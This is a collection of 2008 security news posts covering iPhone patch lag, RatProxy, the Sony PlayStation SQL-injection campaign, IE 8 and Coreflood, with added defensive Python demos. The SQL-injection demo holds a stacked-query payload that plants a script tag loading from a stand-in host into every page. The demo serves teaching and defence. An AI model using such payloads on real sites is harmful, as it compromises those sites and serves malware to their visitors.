A leading Mac OS X security researcher says Apple has not kept the iPhone's operating system up to date with the patches it has issued for the desktop.
The iPhone runs a stripped-down version of Mac OS X 10.5 and automatically checks for software updates. The last update for the phone, firmware 1.1.4, was issued in February.

That means iPhone users are still exposed to a flaw Charlie Miller demonstrated in March.
During the CanSecWest conference, Miller found and exploited a buffer overflow in WebKit, the rendering engine that desktop Safari and the iPhone's browser share, to win the $10,000 Pwn2Own contest. Apple patched the vulnerability for the desktop in April but so far has not issued a corresponding patch for the iPhone. Because the two platforms share that code base, the desktop fix effectively tells anyone who compares the patched and unpatched binaries where the bug is, which is why a lag between the desktop and phone patches matters.
Miller recently told the Washington Post that he has a version of the exploit that works on the iPhone.
Meanwhile, ZDNet's Ryan Naraine points out that another iPhone exploit is expected soon from Aviv Raff.
Speculation within the security community is that Apple is currently focused on the 3G version of the iPhone. Updates for current iPhones may be pushed out ahead of, or concurrently with, the July 11 release of the iPhone 2.0 software.
Apple did not respond to requests for comment on its software security policies.
- Topics:
- Security
- Tags:
- security,
- iPhone,
- Apple,
- Charles Miller,
- Safari,
- CanSecWest

Google released a free tool Tuesday that should help Web developers find and fix cross-site vulnerabilities.
The tool, RatProxy, is described by Google as "a semi-automated, largely passive Web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex Web 2.0 environments."
The tool is versatile, detecting and ranking a broad class of vulnerabilities, including script injection, cross-site trust attacks, content-serving vulnerabilities, cross-site request forgery (XSRF), and cross-site scripting (XSS). Because it is passive, it never sends attack payloads of its own: it watches the requests and responses a tester generates by using the application normally and flags patterns in that traffic.
RatProxy runs on Linux, FreeBSD, Mac OS X, and Windows (Cygwin) environments.
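To make the "largely passive" approach concrete, here is an added example of three checks of the kind such a proxy runs over observed traffic. It is illustrative code written for this page, not ratproxy's own source or Google's detection logic, and the proxy log it audits is a constructed sample (the shop.example host, its parameters and the token names it looks for are all assumptions). It flags state-changing POSTs with no anti-XSRF token, JSON served as text/html or without a parser-breaking prefix, and query values containing markup that the response echoes unescaped.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log entries, not real ratproxy output or real site traffic:
# (method, url, request_body, response_content_type, response_body)
TRAFFIC = [
    ("POST", "http://shop.example/cart/add", "item=42&qty=1",
     "text/html", "<html>Added 1 item</html>"),
    ("POST", "http://shop.example/account/email", "email=a%40b.example&csrf_token=7f3a9c",
     "text/html", "<html>Updated</html>"),
    ("GET", "http://shop.example/api/profile", "",
     "text/html", '{"name": "Alice", "balance": 120}'),
    ("GET", "http://shop.example/api/orders", "",
     "application/json", ")]}'\n[{\"id\": 1}]"),
    ("GET", "http://shop.example/search?q=%3Cb%3Ehi%3C%2Fb%3E", "",
     "text/html", "<html>Results for <b>hi</b></html>"),
    ("GET", "http://shop.example/safe-search?q=%3Cb%3Ehi%3C%2Fb%3E", "",
     "text/html", "<html>Results for &lt;b&gt;hi&lt;/b&gt;</html>"),
]

# Assumed naming convention for anti-XSRF tokens carried in the request body.
TOKEN_NAME = re.compile(r"csrf|xsrf|token|nonce", re.I)
# Prefixes that make a JSON body unparseable when pulled in via <script src=...>.
XSSI_PREFIXES = (")]}'", "while(1);", "for(;;);")


def check_xsrf(method, url, body):
    # A state-changing POST whose body carries no secret token is forgeable
    # from any page the victim visits.
    if method != "POST":
        return []
    if any(TOKEN_NAME.search(name) for name in parse_qs(body)):
        return []
    return [(url, "POST without anti-XSRF token")]


def check_json(url, content_type, body):
    stripped = body
    for prefix in XSSI_PREFIXES:
        if stripped.startswith(prefix):
            stripped = stripped[len(prefix):]
            break
    try:
        json.loads(stripped)
    except ValueError:
        return []                       # not JSON, nothing to say
    findings = []
    if not content_type.startswith("application/json"):
        # A browser renders this as a document, so any string in it is markup.
        findings.append((url, "JSON served as text/html"))
    if stripped == body:
        # No prefix: the data can be included cross-site as a script.
        findings.append((url, "JSON without parser-breaking prefix"))
    return findings


def check_reflection(url, content_type, body):
    # A query value containing markup that comes back byte-for-byte is the
    # classic precursor of reflected XSS.
    if not content_type.startswith("text/html"):
        return []
    findings = []
    for name, values in parse_qs(urlsplit(url).query).items():
        for value in values:
            if "<" in value and value in body:
                findings.append((url, "parameter %r reflected unescaped" % name))
    return findings


def audit(traffic):
    findings = []
    for method, url, req_body, ctype, resp_body in traffic:
        findings += check_xsrf(method, url, req_body)
        findings += check_json(url, ctype, resp_body)
        findings += check_reflection(url, ctype, resp_body)
    return findings


if __name__ == "__main__":
    for url, note in audit(TRAFFIC):
        print(url, "->", note)
```

The value of running these checks passively is that they cost nothing beyond the traffic a tester already generates; the price is that each finding is only a candidate (a POST may carry its token in a header the check does not look at, for instance) and needs a human to confirm it.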
Google RatProxy detects and prioritizes a variety of common cross-site vulnerabilities. (Credit: Google)
- Topics:
- Security

Last weekend, several hundred Lithuanian Web sites were defaced with pro-Soviet and anti-Lithuanian slogans, according to The New York Times.
Last Friday, Lithuanian government sites were warned of an impending Web attack and mounted appropriate defenses. Several hundred commercial sites did not and took the brunt of the attack over the weekend. By Monday, nearly all of the sites had been restored.
As with last year's denial-of-service attacks on Estonia, which followed the relocation of a Soviet-era war memorial, the new attacks appear to be a reaction to a Soviet-related grievance, in this case a law outlawing the display of Soviet symbols in Lithuania. Germany has similar laws outlawing the display of Nazi symbols.
Early evidence suggests a group of criminal hackers may have organized the attacks. The IP addresses used in the attacks appear to come from a variety of nations, but Reston, Va.-based iDefense told the Washington Post that one site, hack-war.ru, appeared to have organized the protest.
Over at our sister site ZDNet, Dancho Danchev examines whether the defacements could escalate into denial-of-service attacks, and concludes they might.
Meanwhile, in his blog, Brian Krebs speculates on nations or nationalistic parties within nations mounting or defending themselves against cyberattacks such as these in the future.
- Topics:
- Criminal Hackers,
- Security
- Tags:
- security,
- Lithuania,
- Estonia,
- Brian Krebs,
- Dancho Danchev

On Thursday, Opera released version 9.51. The new version fixes a few security vulnerabilities and resolves some stability issues. One of the fixes addresses an arbitrary code execution vulnerability that was not previously made public.
Meanwhile, Mozilla released Firefox 2.0.0.15 with a dozen security fixes, including several for remote code execution vulnerabilities.
Current Firefox 2 users should, however, upgrade to Firefox 3, which adds blocking of known malware-hosting sites and other security features.
- Topics:
- Browsers and extensions,
- Security

On Thursday, Microsoft announced four security bulletins for next week's Patch Tuesday. The advance notification is intended as a heads-up for IT departments ahead of the release. All four are rated important, the second-most serious ranking on the software giant's scale.
Two of the bulletins address vulnerabilities in Windows, one allowing remote code execution and the other spoofing. Another affects Windows and Microsoft SQL Server and involves elevation of privilege. The final bulletin affects Microsoft Exchange Server and also involves elevation of privilege.

Early Wednesday, antivirus vendor Sophos reported that some visitors to the Sony PlayStation site may have been prompted to download a fake antivirus scanner.
Pages promoting the PlayStation games SingStar Pop and God of War contained code inserted through SQL injection. Visitors to those specific game pages would see a fake antivirus scan, then a message that their computer was infected with various viruses and Trojan horses; the user would then be asked to purchase the scanner to remove the nonexistent malware.
The injected code linking to the scanner has since been removed.
Sophos said the attack could have delivered malicious payloads, but did not.
Security researcher Dancho Danchev said in his ZDNet blog that Sony wasn't alone: it was one of 794 domains hit in the latest automated SQL-injection campaign, which uses a multilayer fast-flux infrastructure built around coldwop.com. Google reports that over the last 90 days 794 domains have been found carrying code that points to that domain. These are legitimate sites whose Web applications have injection flaws that let criminal hackers insert code pointing to the attackers' servers.
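The mechanics of that injection are simple enough to show in a few lines. The following is an added example written for this page, not Sony's code or anything from Danchev's analysis: a page-view handler that pastes a request parameter into SQL next to the same handler with the value bound as a parameter, plus the query a site owner can run to find rows that already carry an injected tag. The table, the page content, the malware.example hostname and the payload shape are constructed; sqlite3's executescript() stands in for the stacked-query behaviour of the database stacks hit in 2008.

```python
import sqlite3

# Constructed sample content for a game-promotion site; not Sony's data.
PAGES = [
    (1, "SingStar Pop", "Sing along with the latest hits."),
    (2, "God of War", "Kratos returns."),
]

# Constructed hostname standing in for the attacker's fast-flux domain.
INJECTED_TAG = '<script src="http://malware.example/x.js"></script>'

# What an automated campaign sends as the page-id parameter: a valid id, a
# statement terminator, then an UPDATE that appends the tag to every row.
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, "
                 "body TEXT, views INTEGER NOT NULL DEFAULT 0)")
    conn.executemany("INSERT INTO pages (id, title, body) VALUES (?, ?, ?)", PAGES)
    conn.commit()
    return conn


def record_view_vulnerable(conn, page_id):
    # The id is pasted into the SQL text. executescript() runs every statement
    # in the string, emulating servers that accept stacked queries; sqlite3's
    # plain execute() would refuse the second statement.
    conn.executescript("UPDATE pages SET views = views + 1 WHERE id = " + page_id + ";")


def record_view_hardened(conn, page_id):
    # Validate the type, then let the driver bind the value: the input is data,
    # never SQL text, so a trailing statement cannot be smuggled in.
    try:
        pid = int(page_id)
    except ValueError:
        return False
    conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (pid,))
    conn.commit()
    return True


def injected_pages(conn):
    # The check a site owner can run today: which rows now carry a script tag?
    rows = conn.execute("SELECT id FROM pages WHERE body LIKE '%<script%' ORDER BY id")
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = fresh_db()
    record_view_vulnerable(db, PAYLOAD)
    print("injected after vulnerable handler:", injected_pages(db))          # [1, 2]
    db = fresh_db()
    print("hardened handler accepted payload:", record_view_hardened(db, PAYLOAD))  # False
    print("injected after hardened handler:", injected_pages(db))            # []
```

The hardened version rejects the payload outright because it is not an integer, but the parameter binding alone would have been enough: even a text column would receive the whole string as one value rather than as two statements. The LIKE scan is the quick triage query; a campaign of this kind typically touches every text column it can reach, so the real cleanup is a search across all of them.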
With fast-flux hosting, the registered domain name stays the same while the IP addresses it resolves to change every few minutes: the DNS records carry very short TTLs and point at a rotating pool of compromised machines that proxy to the real malicious server, so taking down any single host does not remove the content.
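The rotation described above is also what gives fast-flux away. The following added example, written for this page rather than taken from Danchev's or anyone else's tooling, summarizes a log of repeated A-record lookups and flags names that hand out many addresses across many networks with short TTLs. The lookups are constructed sample data, the hostnames are placeholders, the /16 prefix count is a crude stand-in for an ASN lookup, and the thresholds are illustrative assumptions.

```python
import ipaddress
from collections import namedtuple

# One A-record lookup: the queried name, the TTL returned, the addresses in the answer.
Lookup = namedtuple("Lookup", "name ttl addresses")

# Constructed observations (not real DNS data), as a resolver log would record
# them over roughly half an hour of repeated queries.
LOOKUPS = [
    Lookup("static.example", 86400, ["198.51.100.10", "198.51.100.11"]),
    Lookup("static.example", 86400, ["198.51.100.11", "198.51.100.10"]),
    Lookup("static.example", 86400, ["198.51.100.10", "198.51.100.11"]),
    Lookup("flux.example", 300, ["203.0.113.5", "192.0.2.77", "198.51.100.200"]),
    Lookup("flux.example", 300, ["192.0.2.19", "203.0.113.140", "198.51.100.8"]),
    Lookup("flux.example", 180, ["203.0.113.201", "192.0.2.9", "198.51.100.250"]),
]


def summarize(lookups, name):
    ips, ttls = set(), []
    for entry in lookups:
        if entry.name == name:
            ips.update(entry.addresses)
            ttls.append(entry.ttl)
    # /16 prefixes approximate "how many different networks"; a real detector
    # would map each address to its ASN instead.
    prefixes = {ipaddress.ip_network(ip + "/16", strict=False) for ip in ips}
    return {
        "lookups": len(ttls),
        "distinct_ips": len(ips),
        "distinct_prefixes": len(prefixes),
        "max_ttl": max(ttls) if ttls else None,
    }


def looks_fast_flux(summary, min_ips=6, min_prefixes=3, max_ttl=600):
    # Illustrative thresholds: many addresses, spread across networks, all
    # handed out with TTLs short enough to rotate every few minutes.
    return (summary["distinct_ips"] >= min_ips
            and summary["distinct_prefixes"] >= min_prefixes
            and summary["max_ttl"] is not None
            and summary["max_ttl"] <= max_ttl)


if __name__ == "__main__":
    for name in ("static.example", "flux.example"):
        s = summarize(LOOKUPS, name)
        print(name, s, "fast-flux" if looks_fast_flux(s) else "normal")
```

A content-delivery network also rotates addresses with short TTLs, which is why the network-diversity condition matters: a CDN's addresses cluster in the provider's own ranges, whereas a flux pool built from infected home machines is scattered across consumer ISPs.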
Danchev concludes: "If you don't take care of your Web application vulnerabilities, someone else will."
- Topics:
- Criminal Hackers,
- Security
- Tags:
- security,
- Sony,
- PlayStation,
- coldwop.com,
- fast-flux,
- SingStar Pop,
- God of War

On Wednesday, Microsoft announced new security features in the upcoming Internet Explorer 8 Beta 2. The features are designed to combat the rising tide of drive-by downloads and malicious scripts delivered through carefully crafted links embedded in e-mail and Web pages. Most of the new features require Windows Vista SP1 or Windows XP SP3.
Perhaps the most anticipated addition is Internet Explorer's new antimalware protection. Opera 9.5 and Firefox 3 both recently added blocking of known malware-hosting sites; Apple has so far announced no equivalent for Safari. Using mostly its own antimalware technology, Microsoft will block emerging threats by masking the entire IE 8 browser window with a warning. Combined with the existing antiphishing protection, the feature will be rebranded as the Microsoft SmartScreen filter.
IE 8 Beta 2 will also have a cross-site scripting (XSS) filter aimed at reflected XSS: script smuggled into a crafted link is detected when the page echoes it back, and is neutered before it can run in the browser.
Previously announced features include highlighting the domain name within the URL (so you can see at a glance that you are on eBay.com and not on a look-alike host that merely contains "ebay.com" somewhere in its name), and support for Extended Validation (EV) SSL certificates.
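Domain highlighting is worth a closer look because the part of the host a browser highlights is the registrable domain, not whatever familiar name appears first. The example below is added for this page and is not Microsoft's implementation: it finds the registrable domain with a tiny embedded subset of the Public Suffix List (an assumption; a browser consults the full list) and shows that "www.ebay.com.login-verify.example", a user@host trick, and a .co.uk host all resolve to the domain that actually controls the page.

```python
import ipaddress
from urllib.parse import urlsplit

# Tiny subset of the Public Suffix List, embedded so the example runs offline;
# a browser consults the full list.
PUBLIC_SUFFIXES = {"com", "net", "org", "example", "uk", "co.uk", "org.uk"}


def registrable_domain(url):
    """Return the part of the host a browser would highlight, or None."""
    host = urlsplit(url).hostname       # drops scheme, user@ prefix, port, path
    if host is None:
        return None
    try:
        ipaddress.ip_address(host)
        return host                     # a bare IP address is its own "domain"
    except ValueError:
        pass
    labels = host.rstrip(".").split(".")
    # Walk from the left until the remainder is a public suffix; the label
    # just before it plus the suffix is what the site's owner registered.
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return None                         # host is itself a suffix, or TLD unknown


def belongs_to(url, expected):
    """True only when the URL's registrable domain is exactly `expected`."""
    return registrable_domain(url) == expected


if __name__ == "__main__":
    for url in ("http://signin.ebay.com/ws/eBayISAPI.dll",
                "http://www.ebay.com.login-verify.example/signin",
                "http://www.ebay.com@203.0.113.7/signin",
                "https://www.example.co.uk/"):
        print(url, "->", registrable_domain(url))
```

Note that the two-level suffixes such as co.uk are why a fixed "last two labels" rule does not work: "www.example.co.uk" would be highlighted as "co.uk", which identifies nobody.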

IE 8 enables Data Execution Prevention (DEP/NX) by default on Windows XP SP3 and Windows Vista SP1, so an exploit that lands code in a data page cannot execute it; the SmartScreen filter, separately, blocks downloads it deems dangerous. (Credit: Microsoft)
IE 8 Beta 1 had already introduced several changes to the handling of ActiveX components. Components can be installed per user, which eliminates the need for everyone to have administrator privileges. In addition, you must acknowledge ...
- Topics:
- Browsers and extensions,
- Security
- Tags:
- security,
- Microsoft,
- IE8,
- Cross Domain Messaging (XDM),
- Cross Domain Requests (CDR),
- Cross Site Scripting (XSS),
- SmartScreen

A group of researchers said Tuesday that 637 million Web users are surfing with outdated browsers and are therefore at greater risk from Web-based attacks.
Using data collected from Google Web searches and from security firm Secunia, the researchers, Stefan Frei (ETH Zurich), Thomas Dübendorfer (Google), Gunter Ollmann (IBM ISS), and Martin May (ETH Zurich), analyzed the browsers in use in a new report (PDF). They did so in an effort to understand why so many recent attacks by criminal hackers have targeted the browser, and why those attacks have been so successful.
Overall, the authors found that roughly 40 percent of users were running insecure versions of their browser. The least up to date were users of Internet Explorer, which currently dominates the browser market.
The data was collected in mid-June 2008. Browser share among the users observed was 78 percent Internet Explorer, 16 percent Firefox, 3 percent Safari, and 0.8 percent Opera. Of these, 52 percent of Internet Explorer users were running the latest version, compared with 92 percent for Firefox, 70 percent for Safari, and 90 percent for Opera.
The authors note that it has taken IE 7, the current Internet Explorer release, 19 months to reach only 52 percent of the Internet Explorer audience; the other 48 percent were still running IE 6 or older.
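The study's numbers come from classifying the User-Agent strings browsers send with every request. The following is an added example of that classification, written for this page and not the researchers' code: it extracts the browser family and version from a User-Agent string and counts how many users are behind the current release. The "current" versions are the example's assumption for mid-June 2008 (IE 7, Firefox 2.0.0.14, Safari 3.1, Opera 9.50), not the report's table, and the User-Agent strings are a constructed sample.

```python
import re
from collections import defaultdict

# Assumed current versions as of mid-June 2008 (example's assumption, not the
# report's data). Tuples compare element by element, so (2,0,0,14) >= (2,0,0,12).
LATEST = {"IE": (7, 0), "Firefox": (2, 0, 0, 14), "Safari": (3, 1), "Opera": (9, 50)}

# Order matters: Opera and some IE builds carry other browsers' tokens too.
PATTERNS = [
    ("Opera", re.compile(r"Opera[/ ](\d+(?:\.\d+)*)")),
    ("IE", re.compile(r"MSIE (\d+(?:\.\d+)*)")),
    ("Firefox", re.compile(r"Firefox/(\d+(?:\.\d+)*)")),
    ("Safari", re.compile(r"Version/(\d+(?:\.\d+)*).*Safari/")),
]


def browser_version(user_agent):
    """Return (family, version_tuple); version is None when it cannot be read."""
    for family, pattern in PATTERNS:
        match = pattern.search(user_agent)
        if match:
            return family, tuple(int(part) for part in match.group(1).split("."))
    if "Safari/" in user_agent:
        # Safari 2 and earlier sent no Version/ token, so they are at best old.
        return "Safari", None
    return None, None


def is_current(family, version):
    return version is not None and version >= LATEST[family]


def outdated_share(user_agents):
    """Per family: (total seen, number not on the latest version)."""
    counts = defaultdict(lambda: [0, 0])
    for ua in user_agents:
        family, version = browser_version(ua)
        if family is None:
            continue
        counts[family][0] += 1
        if not is_current(family, version):
            counts[family][1] += 1
    return {family: tuple(pair) for family, pair in counts.items()}


# Constructed sample of User-Agent strings, not data from the study.
SAMPLE = [
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12",
    "Opera/9.50 (Windows NT 5.1; U; en)",
    "Opera/9.27 (Windows NT 5.1; U; en)",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Safari/525.20",
    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3",
]

if __name__ == "__main__":
    for family, (total, stale) in sorted(outdated_share(SAMPLE).items()):
        print("%-8s %d seen, %d outdated" % (family, total, stale))
```

The limitation the study itself faced is visible here: a User-Agent string reports the version the browser claims, which says nothing about plug-ins such as Flash or QuickTime, and a major version number alone (IE 7) hides whether the monthly security updates for it have been applied.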
Some of this has to do with how the respective vendors deliver updates. IE 7 is currently offered ...
- Topics:
- Browsers and extensions,
- Security
- Tags:
- security,
- browsers,
- Internet Explorer,
- Firefox,
- Opera,
- Safari,
- Stefan Frei,
- Thomas Dübendorfer,
- Gunter Ollmann,
- Martin May

Taking a cue from Morgan Spurlock, who lived on fast food for 30 days in the documentary Super Size Me, McAfee gathered volunteers from around the world who would, for one hour a day, surf the Internet, sign up for various newsletters, and fill in various forms. As they did so, the participants were asked to blog about their experiences.
On Tuesday, McAfee released the results of the experiment it called S.P.A.M., or Spammed Persistently All Month.
Over the course of the month, McAfee's test subjects accumulated 104,000 spam messages, or roughly 70 per day per recipient. Put another way, 87 percent of all the e-mail captured on the test laptops was considered to be spam. That isn't too surprising.
What is surprising, according to Dave Marcus, director of security research and communications for McAfee Avert Labs, is the amount of foreign language spam, with Germany and France having the highest percentage of local language spam.
Other findings include:
Men received more spam than women (76.6 per day vs. 60.6 per day).
The United States received more total spam, followed by Brazil and Italy.
Nigerian scam e-mails are more popular in the United Kingdom than in the United States.
What's also interesting, at least to me, is that the McAfee results were similar to results released by Symantec. McAfee used about 50 real-world participants while Symantec used its DeepThreat Network of thousands of computers worldwide.
You can hear more of Dave Marcus' ...
- Topics:
- Security,
- Chat and e-mail
- Tags:
- security,
- McAfee,
- S.P.A.M.,
- Dave Marcus,
- Symantec
On Monday, SecureWorks released its analysis of the Coreflood Trojan, providing an inside look at a stealthy online predator.
According to a blog post by Joe Stewart, director of malware research for SecureWorks, Coreflood started out as an IRC (Internet relay chat) botnet back in 2002. Coreflood--or AFcore, as the author refers to it within the code--is apparently treated by its author as corporate software to be tweaked as business needs change. For example, over the last six years Coreflood has evolved from launching distributed denial-of-service attacks to collecting IDs and passwords for bank fraud.
With the help of the antispam organization Spamhaus, SecureWorks gained access to one of Coreflood's command-and-control servers. What Stewart found there was not only source code but 50 gigabytes of compressed data, searchable in a MySQL database.
The database held 378,758 unique bot IDs over a 16-month period and logged the time-stamped lifecycle, from infection to removal, of each compromised computer. Stewart found the average infection lasted about 66 days.
The other finding was that many computers within a single organization would get infected. That is not surprising in itself, but the time stamps show how quickly bots spread within corporate networks and government agencies.

The graph shows how a state police agency was infected with Coreflood from April 2007 through January 2008. (Credit: SecureWorks)
What Stewart found by looking at the log files is that Coreflood would enter a network via a drive-by browser exploit, download a ...
- Topics:
- Security
- Tags:
- security,
- SecureWorks,
- Joe Stewart,
- CoreFlood,
- AFCore

